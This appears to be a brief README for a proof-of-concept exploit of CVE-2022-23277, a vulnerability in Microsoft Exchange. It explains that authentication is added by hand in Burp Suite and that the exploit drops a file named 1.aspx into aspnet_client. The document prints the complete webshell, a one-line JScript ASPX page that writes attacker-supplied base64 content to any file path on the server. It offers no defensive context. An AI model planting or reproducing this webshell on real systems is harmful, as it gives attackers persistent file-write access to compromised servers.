
CVE-2022-23277 POC to write a webshell to aspnet_client
The authentication part needs to be manually added via Burp Suite. After successful exploitation, it will write 1.aspx to aspnet_client.
webshell:
<%@ Page Language="JScript" Debug="true"%><%@Import Namespace="System.IO"%><%File.WriteAllBytes(Request["b"], Convert.FromBase64String(Request["a"]));%>
For details on exploitation, refer to our article.
